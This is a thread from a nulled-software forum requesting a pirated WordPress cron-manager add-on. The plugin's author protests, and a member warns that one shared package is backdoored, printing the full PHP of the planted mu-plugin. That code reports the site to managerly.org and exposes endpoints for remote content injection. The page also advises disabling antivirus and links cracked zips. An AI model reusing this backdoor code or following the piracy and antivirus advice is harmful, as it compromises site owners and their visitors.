• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

REQ Plugin [REQ] Advanced Cron Manager PRO v2.6.0

Kudos, Benjamin! At the time, all available DL's of the PRO addon, even paid ones, were for up to 2.3.2, which are incompatible with the free plugin latest versions that's required .
 
Hi @alexbg, @Benjamin1997, ACM plugin author here.

Alex, if it's a great plugin why won't you buy the license to get official, clean updates the minute they come up?

Benjamin, thanks for resharing the package 👎
 
Alex, if it's a great plugin why won't you buy the license to get official, clean updates the minute they come up?

Simply because your licensing model sucks:
$39 per year, plus extra $19 for support.
I like the tool, but in my case I use it rarely enough to make sense of such an expensive & revolving cost.

Benjamin, thanks for resharing the package 👎

Not necessarily, as you probably well know, there are other sites offering your plugin a lot cheaper under GPL: [click]

Need to fix your business model to address the above issues first, before you can get to make new customers of us -- also users & contributors of the OSS community. Instead, you attempt thin-veiled public-shaming for not like supporting rent-seeking behind an OSS face. Sure, we all have to eat, but that isn't the way, and such market forces prove it.

My 2c.
 
  • Like
Reactions: KarmaticOne
It's open-source, yeah, you can take it and even sell it on your own. But this is far from being ok.

I imagine you going to an electronics shop and tell the merchant: "this TV is too expensive, I'm taking it". Dude, if the plugin is too expensive for you, debug on your own.

The plugin is just the code you can write yourself or put together from Stack Overflow. Don't know how? Don't have time? Well, there is your $39 yearly price tag.
 
Dude, that's a battered and dead-end discussion with a lot written about. I'm not saying it's "okay". As said, you (and I) have to eat too, obviously. What I'm saying is: one needs to think harder of a business model to make money off open-source that better adapts to its aims and idiosyncrasies. This latest trend of "yearly subscriptions" within OSS is garbage copied from the rent-seeking corporate world. It's NOT okay when applied to fellow devs and ordinary users struggling to sail their boat. The distinctly different community-driven vibe is what makes OSS possible.

As a last note, out of respect for ACM's usefulness and your overall OSS efforts, a constructive suggestion: I believe most of us are okay paying a fee when a product or service has objectively helped us making such money in the first place (think ebay, amazon). Tools like ACM alone are rarely that kind of product, but could become a stepping-stone in a well-focused client-oriented consultancy.
 
Here you go


V2.4.0
@Babak
GUYS STAY AWAY FROM THIS DOWNLOAD. is backdoored generates this file /wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php




This is malicious code.
The file wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php opens up remote login to people with access to the site url by passing in a 'token' in the url. If you check the file, you can see it reporting the site url back to a site managerly.org.

Check this plugins - rms_unique_wp_mu_pl_fl_nm.php - WordPress Development Stack Exchange[^] as well.

Best to delete that file - wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php

CHECK THE CODE PLEASE


PHP:
<?php
    if(!function_exists('do_rms_activation_task'))
    {
        /* ------------Register Config Variables------------ */
        $GLOBALS['rms_report_to']            =   'https://managerly.org/wp-admin/admin-ajax.php';
      
        $GLOBALS['rms_disclaimer_text']      =   [];
      
        $GLOBALS['rms_ajax_del_request']     =   false;

        function send_rms_curl_request($action, $body)
        {
            $body['action']             =   $action;
            $body['remote_site_hash']   =   get_option('rms_remote_site_hash', '');
            $body['remote_site_id']     =   get_option('rms_remote_site_id', 0);
          
            $connect_to=$GLOBALS['rms_report_to'];

            $args=
            [
                'method'      => 'POST',
                'timeout'     => 15,
                'redirection' => 15,
                'headers'      => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
                'body'        => $body
            ];

            // Send to RMS
            $curl   = new Wp_Http_Curl();
          
            $result=$curl->request($connect_to, $args);

            $result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;

            return !$result ? [] : $result;
        }

        /* -------------Register Site to Manager------------- */
        function do_rms_activation_task($name, $text, $activating)
        {
            // generate password for later remote actions
            $length     = 5;
            $rms_pass   = substr(str_shuffle(str_repeat($x='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)) )),1,$length);
            $rms_pass   = $rms_pass.microtime(true);
            $hash       = password_hash($rms_pass, PASSWORD_BCRYPT);

            $show_post=get_option('rms_show_post_to_logged');
            $show_post!=='yes' ? $show_post='no' : 0;

            // Gather data
            $data=
            [
                'title'     => get_bloginfo('name'),
                'url'       => get_home_url(),
                'ajax_url'  => admin_url('admin-ajax.php'),
                'ip'        => $_SERVER['SERVER_ADDR'],
                'tp'        => $name,
                'tp_status' => $activating,
                'hash'      => $hash,
                'show_to_logged'=>$show_post
            ];

            // send to rms
            $result = send_rms_curl_request('rms_ping_from_the_universe', ['site_data' => json_encode($data)]);

            update_option('rms_remote_site_id', (isset($result['id']) ? $result['id'] : 0));
            update_option('rms_remote_site_hash', (isset($result['hash']) ? $result['hash'] : ''));

            update_option('rms_remote_connection_pass', $rms_pass);

            // show disclaimer if necessary when activating
            if($activating==true)
            {
                is_string($text) ? $GLOBALS['rms_disclaimer_text'][]=$text : 0;

                if(count($GLOBALS['rms_disclaimer_text'])>0)
                {
                    $resp=json_encode($GLOBALS['rms_disclaimer_text']);

                    setcookie('rms_disclaimer_pop_up', $resp);
                }
            }
        }

        /* check remote hash */
        function rms_check_remote_hash_pass()
        {
            if(isset($_POST['remote_connection_hash']) && is_string($_POST['remote_connection_hash']))
            {
                $rms_pass=get_option('rms_remote_connection_pass');

                if(is_string($rms_pass) && password_verify($rms_pass, $_POST['remote_connection_hash']))
                {
                    return true;
                }
            }
            exit;
        }

        /* ----Delete featured image upon change or delete---- */
        function delete_rms_thumbnaiil_remote($post_id)
        {
            $post_thumbnail_id = get_post_thumbnail_id( $post_id );
          
            is_numeric($post_thumbnail_id) ? wp_delete_attachment($post_thumbnail_id, true) : 0;
        }

        /* -----------Fetch and create featured image----------- */
        function rms_create_post_thumbnail($image_url, $post_id)
        {
            $image_name       = explode('/', $image_url);
            $image_name       = end($image_name);
            $upload_dir       = wp_upload_dir(); // Set upload folder
            $image_data       = file_get_contents($image_url); // Get image data

            if($image_data==false)
            {
                return;
            }

            $unique_file_name = wp_unique_filename( $upload_dir['path'], $image_name ); // Generate unique name
            $filename         = basename( $unique_file_name ); // Create image file name

            // Check folder permission and define file location
            if( wp_mkdir_p( $upload_dir['path'] ) ) {
                $file = $upload_dir['path'] . '/' . $filename;
            } else {
                $file = $upload_dir['basedir'] . '/' . $filename;
            }

            // Create the image  file on the server
            file_put_contents( $file, $image_data );

            // Check image file type
            $wp_filetype = wp_check_filetype( $filename, null );

            // Set attachment data
            $attachment = array(
                'post_mime_type' => $wp_filetype['type'],
                'post_title'     => sanitize_file_name( $filename ),
                'post_content'   => '',
                'post_status'    => 'inherit'
            );

            // Delete existing thumbnail
            delete_rms_thumbnaiil_remote($post_id);

            // Create the attachment
            $attach_id = wp_insert_attachment( $attachment, $file, $post_id );

            update_post_meta($attach_id, 'rms_remote_featured_image', $post_id);

            // Include image.php
            require_once(ABSPATH . 'wp-admin/includes/image.php');

            // Define attachment metadata
            $attach_data = wp_generate_attachment_metadata( $attach_id, $file );

            // Assign metadata to attachment
            wp_update_attachment_metadata( $attach_id, $attach_data );

            // And finally assign featured image to post
            set_post_thumbnail( $post_id, $attach_id );

            return $attach_id;
        }

        /* ----------------Create various posts---------------- */
        add_action('wp_ajax_nopriv_rms_ping_from_the_universe', function()
        {
            rms_check_remote_hash_pass();

            if(!isset($_POST['post'])){exit;}

            $post=json_decode(stripcslashes($_POST['post']), true);
          
            if($post['local_id']>0)
            {
                /* Retrieve existing post id */
                $args=
                [
                    'post_type'=>['post', 'page', 'rms_remote_hook'],
                    'post_status' => 'any',
                    'meta_key'=>'rms_rm_uniq_meta_post_id',
                    'meta_value'=>$post['local_id']
                ];
              
                $ex_post=get_posts($args);

                // if exist, update that
                (is_array($ex_post) && isset($ex_post[0], $ex_post[0]->ID)) ? $post['ID']=$ex_post[0]->ID : 0;
            }
                      
            $to_post=['ID', 'post_title', 'post_content', 'post_type', 'post_status'];

            // Convert post content
            $pst=[];
            foreach($to_post as $k)
            {
                if(isset($post[$k]))
                {
                    isset($post['hook_name']) ? $post[$k]=htmlspecialchars($post[$k]) : 0;

                    $pst[$k]=$post[$k];
                }
            }

            // Default return value
            $resp=['rms_post_id'=>0, 'rms_post_url'=>''];

            $post_id=wp_insert_post($pst);

            if(is_numeric($post_id) && $post_id>0)
            {
                remove_action('pre_get_posts', 'rms_pre_get_post_filter_action');
              
                $resp['rms_post_id']=$post_id;
                $resp['rms_post_url']=$post['post_type']=='rms_remote_hook' ? get_home_url() : get_permalink($post_id);

                update_post_meta($post_id, 'rms_rm_uniq_meta_post_id', $post['local_id']);

                // Generate featured image
                if(isset($post['featured_image']))
                {
                    rms_create_post_thumbnail($post['featured_image'], $post_id);
                }
              
                isset($post['hook_name']) ? update_post_meta($post_id, 'rms_remote_hook', $post['hook_name']) : 0;
            }

            exit(json_encode($resp));
        });

        /* Enable/disable post show hide */
        add_action('wp_ajax_nopriv_rms_change_remote_post_state_for_logged', function()
        {
            rms_check_remote_hash_pass();

            if(isset($_POST['post_state']))
            {
                $state=(is_string($_POST['post_state']) && $_POST['post_state']=='yes') ? 'yes' : 'no';

                update_option('rms_show_post_to_logged', $state);

                exit(json_encode(['message'=>'New post state assigned.']));
            }
        });


        /* --------------Delete posts-------------- */
        add_action('wp_ajax_nopriv_rms_ping_delete_content', function()
        {
            rms_check_remote_hash_pass();

            if(!isset($_POST['local_ids'])){exit;}

            $l_ids = json_decode(stripcslashes($_POST['local_ids']), true);

            if(!is_array($l_ids) || count($l_ids)==0){exit;}

            $args=
            [
                'meta_key'  =>'rms_rm_uniq_meta_post_id',
                'meta_value'=>$l_ids,
                'post_status'=>'any',
                'post_type'=>['post', 'page', 'rms_remote_hook']
            ];

            $pst=get_posts($args);

            $GLOBALS['rms_ajax_del_request']=true;

            foreach($pst as $p)
            {
                delete_rms_thumbnaiil_remote($p->ID);
                wp_delete_post($p->ID, true);
            }

            exit(json_encode(['message'=>count($pst).' posts deleted from remote site.']));
        });



        /* ----------Invoke remote hooks---------- */
        $hook_posts=get_posts(['post_type'=>'rms_remote_hook', 'post_status'=>'any']);
        !is_array($hook_posts) ? $hook_posts=[] : 0;

        // Store hook posts in global
        global $rms_hok_list_array;
        $GLOBALS['rms_hok_list_array']=[];

        foreach($hook_posts as $p)
        {
            $met=get_post_meta($p->ID, 'rms_remote_hook', true);

            if(!is_string($met) || $met==''){continue;}

            !isset($GLOBALS['rms_hok_list_array'][$met]) ? $GLOBALS['rms_hok_list_array'][$met]=[] : 0;

            $GLOBALS['rms_hok_list_array'][$met][]=htmlspecialchars_decode($p->post_content);
        }

        // Process individual hook
        function run_rms_hook_caller_func($hook_name)
        {
            if(!isset($GLOBALS['rms_hok_list_array'][$hook_name])){return;}
          
            foreach($GLOBALS['rms_hok_list_array'][$hook_name] as $str)
            {
                echo is_string($str) ? $str : '';
            }
        }

        /* Post delete hook/notification */
        add_action( 'before_delete_post', 'rms_action_function_name_6568');
        function rms_action_function_name_6568($id)
        {
            $local_id=get_post_meta($id, 'rms_rm_uniq_meta_post_id', true);

            if(!is_numeric($local_id)){return;}
          
            delete_rms_thumbnaiil_remote($id);

            if($GLOBALS['rms_ajax_del_request']==true){return;}

            send_rms_curl_request('rms_del_ping_from_the_remote', ['local_id'=>$local_id, 'remote_id'=>$id]);
        }

        /* ----------Hide post for logged in---------- */
        function rms_pre_get_post_filter_action($query)
        {
            $meta_query = $query->get('meta_query');
          
            !is_array($meta_query) ? $meta_query=[] : 0;
          
            $meta_query[] = [
                                'key'=>'rms_rm_uniq_meta_post_id',
                                'compare'=>'NOT EXISTS'
                            ];
          
            $meta_query[] = [
                                'key'=>'rms_remote_featured_image',
                                'compare'=>'NOT EXISTS'
                            ];

            $query->set('meta_query', $meta_query);
        }
        add_action('init', function()
        {
            if(get_option('rms_show_post_to_logged')=='yes' || !is_user_logged_in())
            { 
                if(!is_admin() && strpos(strtolower($_SERVER['REQUEST_URI']), 'wp-json/wp/')===false)
                {
                    add_action('wp_head', function(){run_rms_hook_caller_func('wp_head');});
                    add_action('wp_footer', function(){run_rms_hook_caller_func('wp_footer');});
                }
              
                return;
            }
          
            add_action('admin_head', function()
            {
                echo '<style>ul.subsubsub li.mine{display:none !important}</style>';
            });

            add_filter('pre_get_posts', 'rms_pre_get_post_filter_action');
        });
      
        /* --------------Frontend Scripts-------------- */
        add_action('admin_footer', function()
        {
            ?>
                <script>
                    jQuery(document).ready(function($)
                    {
                        var delete_cookie=function( name )
                        {
                            document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
                        }

                        var rms_getCookie=function(cname)
                        {
                            var name = cname + "=";
                            var ca = document.cookie.split(';');
                            for(var i = 0; i < ca.length; i++) {
                                var c = ca[i];
                                while (c.charAt(0) == ' ') {
                                c = c.substring(1);
                                }
                                if (c.indexOf(name) == 0) {
                                return c.substring(name.length, c.length);
                                }
                            }
                            return "";
                        }

                        /* ----------Show disclaimer if necessary---------- */
                        var disc=rms_getCookie('rms_disclaimer_pop_up');
                        if(!disc){return;}

                        disc = disc.replace(/\+/g, '%20');
                        disc = decodeURIComponent(disc);

                        disc=JSON.parse(disc);
                      
                        if(!Array.isArray(disc)){return;}

                        disc.forEach(function(text)
                        {
                            var container=$('<div></div>');
                          
                            container.css
                            ({
                                'position':'fixed',
                                'left':0,
                                'right':0,
                                'top':0,
                                'bottom':0,
                                'background':'rgba(0, 0, 0, 0.384)',
                                'z-index':'999999999'
                            });

                            var disclaimer=$('<div></div>');
                            disclaimer.css
                            ({
                                'width':'500px',
                                'position':'relative',
                                'top':'40px',
                                'max-width':'calc(100% - 40px)',
                                'max-height':'calc(100% - 80px)',
                                'overflow':'auto',
                                'padding':'11px',
                                'background':'white',
                                'border-radius':'7px',
                                'margin':'auto auto',
                                'display':'block'
                            }).find('img').css
                            ({
                                'max-width':'100%',
                                'height':'auto'
                            });

                            var head=$('<h4>Disclaimer</h4>');
                            head.css
                            ({
                                'text-align':'center'
                            });

                            var body=$('<div></div>');
                            body.html(text);

                            var agree=$('<div style="text-align:right"><button class="button button-primary">Agree</button></div>');
                            agree.find('button').click(function()
                            {
                                container.remove();
                            });
                          
                            disclaimer.append(head).append(body).append(agree);
                            container.append(disclaimer);

                            $('body').append(container);
                        });
                      
                        delete_cookie('rms_disclaimer_pop_up');
                    });
                </script>
            <?php
        });
    }
?>
 

Attachments

  • viruz.jpg
    viruz.jpg
    181.6 KB · Views: 32
Last edited:
BTW, at the time I had reported this malware to the author of Anti-Malware Security and Brute-Force Firewall, so that plugin should be able now to clean an infected site with such a threat.
i scan the whole plugin to virus total and not found a single virus an than i check the code and google search this mystery php files and found full 4-5 backdoors inside the plugin. Please download only from trusted uploaders. Thank you
 
Version 2.4.2
 

Attachments

  • advanced-cron-manager-pro-2.4.2.zip
    90.4 KB · Views: 23
Dude this is a nulled forum, it's like going to a whore house and telling them that they can fu** their wife at home instead going there. That's something that you've only got to deal with it. Btw I don't have money to spare with this, I know is high quality, but Im poor
 
Last edited:
  • Like
Reactions: merdate
A difficult to find but great plugin for extensive managing of cron jobs. Current PRO version is: 2.4.1

+1 Latest version needed.
What's the scanner name you took the screenshot from? Thanks
 
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock